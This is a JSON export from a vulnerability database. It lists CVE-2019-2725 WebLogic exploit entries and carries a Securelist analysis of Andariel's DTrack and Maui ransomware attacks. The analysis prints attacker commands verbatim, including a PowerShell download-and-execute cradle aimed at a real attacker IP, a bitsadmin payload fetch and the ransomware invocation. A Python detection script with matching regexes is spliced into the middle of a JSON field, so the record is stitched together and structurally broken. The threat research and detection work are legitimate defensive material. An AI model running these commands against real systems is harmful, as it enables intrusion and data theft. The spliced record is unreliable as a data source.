cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-08T06:35:28", "type": "githubexploit", "title": "Exploit for Injection in Oracle Agile Plm", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2725"], "modified": "2022-01-03T07:44:53", "id": "D2931851-B196-5CD6-AF75-B24EA22F6115", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-27T22:44:16", "description": "# CVE-2019-2725\n# weblogic\u547d\u4ee4\u56de\u663e+webshell\u4e0a\u4f20<br/>\n**\u514d\u8d23\u58f0\u660e:\u672c\u5de5\u5177\u4ec5\u4f9b\u5b89\u5168\u6d4b\u8bd5\u5b66...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-06-11T00:49:56", "type": "githubexploit", "title": 
"Exploit for Injection in Oracle Agile Plm", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2725"], "modified": "2021-01-02T15:56:01", "id": "9D09C8C3-35C2-51CD-B6E1-6542183770EF", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-27T22:44:30", "description": "# cve-2019-2725\n\nReferences:\n\nTenable - https://www.tenable.com/...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-06-06T19:27:09", "type": "githubexploit", "title": "Exploit for Injection in Oracle Agile Plm", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2725"], 
"modified": "2019-06-06T19:27:29", "id": "F0C27A65-B942-5D87-B7D9-08451A15456C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-17T16:46:04", "description": "# CVE-2019-2725 bypass\n\n## tips\ncoded in python3,payload[here](h...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-06-16T06:17:09", "type": "githubexploit", "title": "Exploit for Injection in Oracle Agile Plm", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2725"], "modified": "2020-03-17T08:04:13", "id": "EEB220AD-2CB0-50FB-A3B9-A87BBC32BA19", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-23T03:59:32", "description": "```\nweblogic CVE-2019-2725 CVE-2019...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": 
"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-06-24T08:33:07", "type": "githubexploit", "title": "Exploit for Injection in Oracle Weblogic Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2725", "CVE-2019-2729"], "modified": "2022-03-23T01:26:21", "id": "4F4AF4AC-0953-5098-98D6-592B918B0836", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "securelist": [{"lastseen": "2022-08-09T15:51:11", "description": "\n\nOn July 7, 2022, the CISA published an alert, entitled, "[North Korean State-Sponsored Cyber Actors Use Maui Ransomware To Target the Healthcare and Public Health Sector](<https://www.cisa.gov/uscert/ncas/alerts/aa22-187a>)," related to a Stairwell report, "[Maui Ransomware](<https://stairwell.com/wp-content/uploads/2022/07/Stairwell-Threat-Report-Maui-Ransomware.pdf>)." Later, the Department of Justice [announced](<https://www.justice.gov/opa/speech/deputy-attorney-general-lisa-o-monaco-delivers-keynote-address-international-conference>) that they had effectively [clawed back $500,000](<https://www.bankinfosecurity.com/fbi-claws-back-cryptocurrency-ransoms-paid-to-north-koreans-a-19621>) in ransom payments to the group, partly thanks to new legislation. 
We can confirm a Maui ransomware incident in 2022, and add some incident and attribution findings.\n\nWe extend their "first seen" date from the reported May 2021 to April 15th 2021, and the geolocation of the target, to Japan. Because the malware in this early incident was compiled on April 15th, 2021, and compilation dates are the same for all known samples, this incident is possibly the first ever involving the Maui ransomware.\n\nWhile CISA provides no useful information in its report to attribute the ransomware to a North Korean actor, we determined that approximately ten hours prior to deploying Maui to the initial target system, the group deployed a variant of the well-known DTrack malware to the target, preceded by 3proxy months earlier. This data point, along with others, should openly help solidify the attribution to the Korean-speaking APT Andariel, also known as Silent Chollima and Stonefly, with low to medium confidence.\n\n## Background\n\nWe observed the following timeline of detections from an initial target system:\n\n 1. 2020-12-25 Suspicious 3proxy tool\n 2. 2021-04-15 DTrack malware\n 3. 2021-04-15 Maui ransomware\n\n## DTrack malware\n\nMD5 | 739812e2ae1327a94e441719b885bd19 \n---|--- \nSHA1 | 102a6954a16e80de814bee7ae2b893f1fa196613 \nSHA256 | 6122c94cbfa11311bea7129ecd5aea6fae6c51d23228f7378b5f6b2398728f67 \nLink time | 2021-03-30 02:29:15 \nFile type | PE32 executable (GUI) Intel 80386, for MS Windows \nCompiler | VS2008 build 21022 \nFile size | 1.2 MB \nFile name | C:\\Windows\\Temp\\temp\\mvhost.exe \n \nOnce this malware is spawned, it executes an embedded shellcode, loading a final Windows in-memory payload. This malware is responsible for collecting victim information and sending it to the remote host. Its functionality is almost identical to previous DTrack modules. This malware collects information about the infected host via Windows commands. 
The in-memory payload executes the following Windows commands:\n \n \n \"C:\\Windows\\system32\\cmd.exe\" /c ipconfig /all > \"%Temp%\\temp\\res.ip\"\n \"C:\\Windows\\system32\\cmd.exe\" /c tasklist > \"%Temp%\\temp\\task.list\"\n \"C:\\Windows\\system32\\cmd.exe\" /c netstat -naop tcp > \"%Temp%\\temp\\netstat.res\"\n \"C:\\Windows\\system32\\cmd.exe\" /c netsh interface show interface >\n \"%Temp%\\temp\\netsh.res\"\n \"C:\\Windows\\system32\\cmd.exe\" /c ping -n 1 8.8.8.8 > \"%Temp%\\temp\\ping.res\"\n\nIn addition, the malware collects browser history data, saving it to the browser.his file, just as the older variant did. Compared to the old version of DTrack, the new information-gathering module sends stolen information to a remote server over HTTP, and this variant copies stolen files to the remote host on the same network.\n\n## Maui ransomware\n\nThe Maui ransomware was detected ten hours after the DTrack variant on the same server.\n\nMD5 | ad4eababfe125110299e5a24be84472e \n---|--- \nSHA1 | 94db86c214f4ab401e84ad26bb0c9c246059daff \nSHA256 | a557a0c67b5baa7cf64bd4d42103d3b2852f67acf96b4c5f14992c1289b55eaa \nLink time | 2021-04-15 04:36:00 \nFile type | PE32 executable (GUI) Intel 80386, for MS Windows \nFile size | 763.67 KB \nFile name | C:\\Windows\\Temp\\temp\\maui.exe \n \nMultiple run parameters exist for the Maui ransomware. In this incident, we observe the actors using "-t" and "-x" arguments, along with a specific drive path to encrypt:\n \n \n C:\\Windows\\Temp\\temp\\bin\\Maui.exe -t 8 -x E:\n\nIn this case, "-t 8" sets the ransomware thread count to eight, "-x" commands the malware to "self melt", and the "E:" value sets the path (the entire drive in this case) to be encrypted. 
The ransomware functionality is the same as described in the Stairwell report.\n\nThe malware created two key files to implement file encryption:\n\nRSA private key | C:\\Windows\\Temp\\temp\\bin\\Maui.evd \n---|--- \nRSA public key | C:\\Windows\\Temp\\temp\\bin\\Maui.key \n \n## Similar DTrack malware on different victims\n\nPivoting on the exfiltration information to the adjacent hosts, we discovered additional victims in India. One of these hosts was initially compromised in February 2021. In all likelihood, Andariel stole elevated credentials to deploy this malware within the target organization, but this speculation is based on paths and other artifacts, and we do not have any further details.\n\nMD5 | f2f787868a3064407d79173ac5fc0864 \n---|--- \nSHA1 | 1c4aa2cbe83546892c98508cad9da592089ef777 \nSHA256 | 92adc5ea29491d9245876ba0b2957393633c9998eb47b3ae1344c13a44cd59ae \nLink time | 2021-02-22 05:36:16 \nFile type | PE32 executable (GUI) Intel 80386, for MS Windows \nFile size | 848 KB \n \nThe primary objective of this malware is the same as in the case of the aforementioned victim in Japan, using different login credentials and local IP address to exfiltrate data.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/04144620/Andariel_Deploys_DTrack_and_Maui_Ransomware_01.png>)\n\n**_Windows commands to exfiltrate data_**\n\nFrom the same victim, we discovered additional DTrack malware (MD5 87e3fc08c01841999a8ad8fe25f12fe4) using different login credentials.\n\n## Additional DTrack module and initial infection method\n\nThe ["3Proxy" tool](<https://3proxy.ru/>), likely utilized by the threat actor, was compiled on 2020-09-09 and deployed to the victim on 2020-12-25. Based on this detection and compilation date, we expanded our research scope and discovered an additional DTrack module. 
This module was compiled 2020-09-16 14:16:21 and detected in early December 2020, having a similar timeline to the 3Proxy tool deployment.\n\nMD5 | cf236bf5b41d26967b1ce04ebbdb4041 \n---|--- \nSHA1 | feb79a5a2bdf0bcf0777ee51782dc50d2901bb91 \nSHA256 | 60425a4d5ee04c8ae09bfe28ca33bf9e76a43f69548b2704956d0875a0f25145 \nLink time | 2020-09-16 14:16:21 \nFile type | PE32 executable (GUI) Intel 80386, for MS Windows \nCompiler | VS2008 build 21022 \nFile size | 136 KB \nFile name | %appdata%\\microsoft\\mmc\\dwem.cert \n \nThis DTrack module is very similar to the EventTracKer module of DTrack, which was previously reported to our Threat Intelligence customers. In one victim system, we discovered that a well-known simple HTTP server, [HFS7](<https://www.rejetto.com/hfs/>), had deployed the malware above. After an unknown exploit was used on a vulnerable HFS server and "whoami" was executed, the Powershell command below was executed to fetch an additional Powershell script from the remote server:\n \n \n C:\\windows\\system32\\WindowsPowershell\\v1.0\\powershell.exe IEX (New-Object Net.WebClient).DownloadString('hxxp://145.232.235[.]222/usr/users/mini.ps1')\n\nThe mini.ps1 script is responsible for downloading and executing the above DTrack malware via bitsadmin.exe:\n \n \n bitsadmin.exe /transfer myJob /download /priority high\n \"hxxp://145.232.235[.]222/usr/users/dwem.cert\" \"%appdata%\\microsoft\\mmc\\dwem.cert\"\n\nThe other victim operated a vulnerable Weblogic server. According to our telemetry, the actor compromised this server via the CVE-2017-10271 exploit. We saw Andariel abuse identical exploits and compromise WebLogic servers in mid-2019, and previously reported this activity to our Threat Intelligence customers. In this case, the exploited server executes the Powershell command to fetch the additional script. The fetched script is capable of downloading a Powershell script from the server we mentioned above (hxxp://145.232.235[.]222/usr/users/mini.ps1). 
Therefore, we can summarize that the actor abused vulnerable Internet-facing services to deploy their malware at least until the end of 2020.\n\n## Victims\n\nThe July 2022 CISA alert noted that the healthcare and public health sectors had been targeted with the Maui ransomware within the US. However, based on our research, we believe this operation does not target specific industries and that its reach is global. We can confirm that the Japanese housing company was targeted with the Maui ransomware on April 15, 2021. Also, victims from India, Vietnam, and Russia were infected within a similar timeframe by the same DTrack malware as used in the Japanese Maui incident: from the end of 2020 to early 2021.\n\nOur research suggests that the actor is rather opportunistic and could compromise any company around the world, regardless of their line of business, as long as it enjoys good financial standing. It is probable that the actor favors vulnerable Internet-exposed web services. Additionally, the [Andariel deployed ransomware](<https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/>) selectively to make financial profits.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/04144725/Andariel_Deploys_DTrack_and_Maui_Ransomware_02.png>)\n\n## Attribution\n\nAccording to the Kaspersky Threat Attribution Engine (KTAE), the DTrack malware from the victim contains a high degree of code similarity (84%) with previously known DTrack malware.\n\nAlso, we discovered that the DTrack malware (MD5 739812e2ae1327a94e441719b885bd19) employs the same shellcode loader as "Backdoor.Preft" malware (MD5 2f553cba839ca4dab201d3f8154bae2a), [published/reported by Symantec](<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/stonefly-north-korea-espionage>) - note that Symantec recently described the Backdoor.Preft malware as "aka Dtrack, Valefor". 
Apart from the code similarity, the actor used the 3Proxy tool (MD5 5bc4b606f4c0f8cd2e6787ae049bf5bb), and that tool was also previously employed by the Andariel/StoneFly/Silent Chollima group (MD5 95247511a611ba3d8581c7c6b8b1a38a). Symantec attributes StoneFly as the North Korean-linked actor behind the DarkSeoul incident.\n\n## Conclusions\n\nBased on the modus operandi of this attack, we conclude that the actor's TTPs behind the Maui ransomware incident are remarkably similar to past Andariel/Stonefly/Silent Chollima activity:\n\n * Using legitimate proxy and tunneling tools after initial infection or deploying them to maintain access, and using Powershell scripts and Bitsadmin to download additional malware;\n * Using exploits to target known but unpatched vulnerable public services, such as WebLogic and HFS;\n * Exclusively deploying DTrack, also known as Preft;\n * Dwell time within target networks can last for months prior to activity;\n * Deploying ransomware on a global scale, demonstrating ongoing financial motivations and scale of interest", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-08-09T10:00:46", "type": "securelist", "title": "Andariel deploys DTrack and Maui ransomware", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", 
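The Conclusions list above names three host-side TTPs that are cheap to detect from process-creation telemetry: the DTrack payload's five recon commands redirected into a Temp\temp directory, the PowerShell IEX/DownloadString cradle, and bitsadmin /transfer pulling the next stage. The following Python is an added example, not code from the Kaspersky write-up or from the actor's tooling; its log format, hostnames, timestamps and the 192.0.2.10 address are constructed, and the regexes are keyed to the exact command lines quoted in the write-up, so they would need widening for variants.

```python
"""Detection sketch for the Andariel TTPs described above (added example).

Scores process-creation events for the DTrack recon commands redirected into
a Temp\\temp directory, the PowerShell IEX/DownloadString cradle, and
bitsadmin /transfer downloads. All sample data below is constructed.
"""
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    ts: int        # epoch seconds (constructed)
    host: str
    cmdline: str   # full command line as a process-creation log records it


# The five recon commands the page lists, keyed by tool. A match only counts
# when the output is also redirected into ...\Temp\temp\ (TEMP_REDIRECT):
# the bare commands are routine admin activity and would be far too noisy.
RECON_TOOLS = {
    "ipconfig": re.compile(r"\bipconfig\s+/all\b", re.I),
    "tasklist": re.compile(r"\btasklist\b", re.I),
    "netstat": re.compile(r"\bnetstat\s+-naop\s+tcp\b", re.I),
    "netsh": re.compile(r"\bnetsh\s+interface\s+show\s+interface\b", re.I),
    "ping": re.compile(r"\bping\s+-n\s+1\s+8\.8\.8\.8\b", re.I),
}
# Accepts both the unexpanded %Temp%\temp\ form shown on the page and the
# expanded C:\Windows\Temp\temp\ form a real log would carry.
TEMP_REDIRECT = re.compile(
    r'>\s*"?(?:%temp%|[a-z]:\\windows\\temp)\\temp\\[^"\s]+', re.I)
# IEX (New-Object Net.WebClient).DownloadString('http://...')
PS_CRADLE = re.compile(
    r"\b(?:iex|invoke-expression)\b.*new-object\s+(?:system\.)?net\.webclient"
    r".*\.downloadstring\(", re.I | re.S)
# bitsadmin /transfer <job> /download ... <http URL> <local path>
BITSADMIN_DL = re.compile(
    r"\bbitsadmin(?:\.exe)?\b.*/transfer\b.*/download\b.*https?://", re.I)


def classify(event: ProcEvent) -> list[str]:
    """Return the rule tags a single event triggers (possibly empty)."""
    tags = []
    cl = event.cmdline
    if TEMP_REDIRECT.search(cl):
        for tool, rx in RECON_TOOLS.items():
            if rx.search(cl):
                tags.append(f"recon:{tool}")
    if PS_CRADLE.search(cl):
        tags.append("powershell_download_cradle")
    if BITSADMIN_DL.search(cl):
        tags.append("bitsadmin_download")
    return tags


def detect(events, window: int = 300, min_tools: int = 3) -> list[dict]:
    """Per-event alerts for the two download techniques, plus one correlation
    alert per host when >= min_tools distinct recon commands land within
    `window` seconds (the payload on the page runs all five back to back)."""
    alerts = []
    recon_by_host = defaultdict(list)   # host -> [(ts, tool)], ts ascending
    for ev in sorted(events, key=lambda e: e.ts):
        for tag in classify(ev):
            if tag.startswith("recon:"):
                recon_by_host[ev.host].append((ev.ts, tag.split(":", 1)[1]))
            else:
                alerts.append({"rule": tag, "host": ev.host, "ts": ev.ts,
                               "detail": ev.cmdline})
    for host, hits in recon_by_host.items():
        for i, (t0, _) in enumerate(hits):          # slide a window over hits
            tools = {tool for ts, tool in hits[i:] if ts - t0 <= window}
            if len(tools) >= min_tools:
                alerts.append({"rule": "dtrack_recon_burst", "host": host,
                               "ts": t0, "detail": sorted(tools)})
                break                                # one burst alert per host
    return alerts


# Constructed sample telemetry; 192.0.2.10 is an RFC 5737 documentation address.
SAMPLE_EVENTS = [
    ProcEvent(1000, "srv-a", r'"C:\Windows\system32\cmd.exe" /c ipconfig /all > "C:\Windows\Temp\temp\res.ip"'),
    ProcEvent(1002, "srv-a", r'"C:\Windows\system32\cmd.exe" /c tasklist > "C:\Windows\Temp\temp\task.list"'),
    ProcEvent(1004, "srv-a", r'"C:\Windows\system32\cmd.exe" /c netstat -naop tcp > "C:\Windows\Temp\temp\netstat.res"'),
    ProcEvent(1006, "srv-a", r'"C:\Windows\system32\cmd.exe" /c netsh interface show interface > "C:\Windows\Temp\temp\netsh.res"'),
    ProcEvent(1008, "srv-a", r'"C:\Windows\system32\cmd.exe" /c ping -n 1 8.8.8.8 > "C:\Windows\Temp\temp\ping.res"'),
    ProcEvent(2000, "web-b", r"C:\windows\system32\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/usr/users/mini.ps1')"),
    ProcEvent(2005, "web-b", r'bitsadmin.exe /transfer myJob /download /priority high "http://192.0.2.10/usr/users/dwem.cert" "C:\Users\svc\AppData\Roaming\microsoft\mmc\dwem.cert"'),
    ProcEvent(3000, "ws-c", r'"C:\Windows\system32\cmd.exe" /c ipconfig /all'),       # admin at a console, no redirect
    ProcEvent(3100, "ws-c", r'"C:\Windows\system32\cmd.exe" /c ping -n 1 8.8.8.8'),   # connectivity check, no redirect
    ProcEvent(4000, "ws-d", r'"C:\Windows\system32\cmd.exe" /c tasklist > "C:\Windows\Temp\temp\task.list"'),  # one hit, below burst threshold
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert["rule"], alert["host"], alert["ts"], alert["detail"])
```

Run stand-alone, the script reports the cradle and the bitsadmin transfer on web-b as single-event alerts and one dtrack_recon_burst on srv-a; the lone tasklist redirect on ws-d and the unredirected commands on ws-c stay silent. The burst threshold and window are parameters because the recon set alone is not unique to DTrack; the redirect into a fixed Temp\temp staging directory is what makes the correlation worth alerting on.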
"accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271"], "modified": "2022-08-09T10:00:46", "id": "SECURELIST:B61F1A3C7FBA17501CE779F4E076EB79", "href": "https://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-10-16T11:39:54", "description": "\n\nFor more than two years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They are designed to highlight the significant events and findings that we feel people should be aware of.\n\nThis is our latest installment, focusing on activities that we observed during Q3 2019.\n\nReaders who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact intelreports@kaspersky.com.\n\n## **The most remarkable findings**\n\nOn August 30, Ian Beer from Google's Project Zero team published an extensive analysis of at least 14 iOS zero-days found in the wild and used in five exploitation chains to escalate privileges by an unknown threat actor. Although the use of watering-hole attacks was popular in the early 2010s, it has now become less common. According to Google, a number of waterholed websites were delivering the exploits, possibly as far back as three years ago (based on September 2016 usage of the first exploit chain). While the blog contains no details about the compromised sites or if they are still active, it claims that these websites receive \"thousands of visitors per week\". 
The first stage Webkit exploit used to infect visitors makes no discrimination other than that the victim uses an iPhone and browses the website with Safari, although the vulnerability would also have worked in other browsers such as Chrome. The lack of victim discrimination would point to a relatively non-targeted attack, but the not-so-high estimate of the number of visitors to the waterholed sites seems to indicate that the attack was targeted at some communities: it is likely that these waterholed sites were all dedicated to some common topic. The blog does not contain many details regarding who the actor behind this attack is, but the high technical capabilities needed to deliver and install this malware, and keep the exploitation chains up-to-date for more than two years, show a high level of resources and dedication. Upon infection, the malware itself will be invisible to the victim. It pings its C2 every 60 seconds for new commands. It is able to get access to all kinds of files in the system, as well as tracking GPS position. There is no mechanism to survive a reboot, but the capability to steal signing-in cookies from a victim's account can keep providing the attackers with access to this data.\n\nShortly after the Google blogpost, Volexity published more details about the waterholing websites used in the attack to distribute the malware, pointing to a \"strategic web compromise targeting Uyghurs\". Citizen Lab published the Android counterpart for this story, stating that between November 2018 and May 2019, senior members of Tibetan groups were targeted by the same actor (this time dubbed POISON CARP by Citizen Lab) using malicious links in WhatsApp text exchanges, with the attackers posing as NGO workers, journalists and other fake personas. 
The links led to code designed to exploit web browser vulnerabilities to install spyware on iOS and Android devices, and in some cases to OAuth phishing pages.\n\nAt the beginning of September 2019, Zerodium, a zero-day brokerage firm, indicated that a zero-day for Android was now worth more than one for iOS: the exploit broker is now willing to pay $2.5 million for a zero-click Android zero-day with persistence. This is a significant increase on the company's previous payout ceiling of $2 million for remote iOS jailbreaks. By contrast, Zerodium [has also reduced payouts](<https://threatpost.com/android-zero-days-worth-more-iphone-exploits/147981/>) for Apple one-click exploits. On the same day, a high-severity zero-day was found in the V4L2 (Video4Linux) driver, the Android media driver. This vulnerability, which could enable privilege escalation, [was not included](<https://threatpost.com/android-zero-day-bug-opens-door-to-privilege-escalation-attack-researchers-warn/148014/>) in Google's September security update. A few days later, an Android flaw was identified that left more than a billion Samsung, Huawei, LG and Sony smartphones vulnerable to an attack that would allow an attacker to [gain full access](<https://www.independent.co.uk/life-style/gadgets-and-tech/news/android-security-flaw-hack-samsung-huawei-phone-text-message-sms-a9093111.html>) to emails on a compromised device using an SMS message.\n\n## **Russian-speaking activity**\n\nTurla (aka Venomous Bear, Uroburos and Waterbug) has made significant changes to its toolset. While investigating malicious activity in Central Asia, we identified a new backdoor that we attribute with medium confidence to this APT group. The malware, named Tunnus, is a .NET-based backdoor with the ability to run commands or perform file actions on an infected system and send the results to its C2. So far, the C2 infrastructure has been built using compromised sites with vulnerable WordPress installations. 
According to our telemetry, Tunnus activity started in March and was still active when we published our private report in July.\n\nTurla has also wrapped its notorious JavaScript KopiLuwak malware in a dropper called Topinambour, a new .NET file that the group is using to distribute and drop KopiLuwak through infected installation packages for legitimate software programs such as VPNs. Some of the changes are to help Turla evade detection. For example, the C2 infrastructure uses IP addresses that appear to mimic ordinary LAN addresses. The malware is almost completely 'fileless': the final stage of infection, an encrypted Trojan for remote administration, is embedded into the computer's registry for the malware to access when ready. Two KopiLuwak analogues \u2013 the .NET RocketMan Trojan and the PowerShell MiamiBeach Trojan \u2013 are used for cyber-espionage. We think that the threat actor deploys these versions where their targets are protected with security software capable of detecting KopiLuwak. All three implants can fingerprint targets, gather information on system and network adapters, steal files and download and execute additional malware. MiamiBeach is also able to take screenshots.\n\nIn September, Zebrocy spear-phished multiple NATO and alliance partners throughout Europe, attempting to gain access to email communications, credentials and sensitive documents. This campaign is similar to past Zebrocy activity, with target-relevant content used within emails, and ZIP attachments containing harmless documents alongside executables with altered icons and identical filenames. The group also makes use of remote Word templates pulling contents from the legitimate Dropbox file sharing site. 
In this campaign, Zebrocy targeted defense and diplomatic targets located throughout Europe and Asia with its Go backdoor and Nimcy variants.\n\n## **Chinese-speaking activity**\n\nHoneyMyte (aka Temp.Hex and Mustang Panda), which has been active for several years, has adopted different techniques to perform its attacks over the past couple of years, and has focused on various targeting profiles. In previous attacks, conducted from mid-2018, this threat actor deployed PlugX implants, as well as multi-stage PowerShell scripts resembling CobaltStrike. That campaign targeted government entities in Myanmar, Mongolia, Ethiopia, Vietnam and Bangladesh. We recently described a new set of activities from HoneyMyte involving attacks that relied on several types of tools. They include: (a) PlugX implants; (b) a multi-stage package resembling the CobaltStrike stager and stageless droppers with PowerShell and VB scripts, .NET executables, cookie-stealers and more; (c) ARP poisoning with DNS hijacking malware, to deliver poisoned Flash and Microsoft updates over http for lateral movement; (d) various system and network utilities. Based on the targeting of government organizations related to natural resource management in Myanmar and a major continental organization in Africa, we assess that one of the main motivations of HoneyMyte is gathering geo-political and economic intelligence. While a military organization was targeted in Bangladesh, it's possible that the individual targets were related to geopolitical activity in the region.\n\nSince the beginning of 2019, we have observed a spike in LuckyMouse activity, both in Central Asia and the Middle East. For these new campaigns, the attackers seem to focus on telecommunications operators, universities and governments. The infection vectors are direct compromise, spear phishing and, possibly, watering holes. 
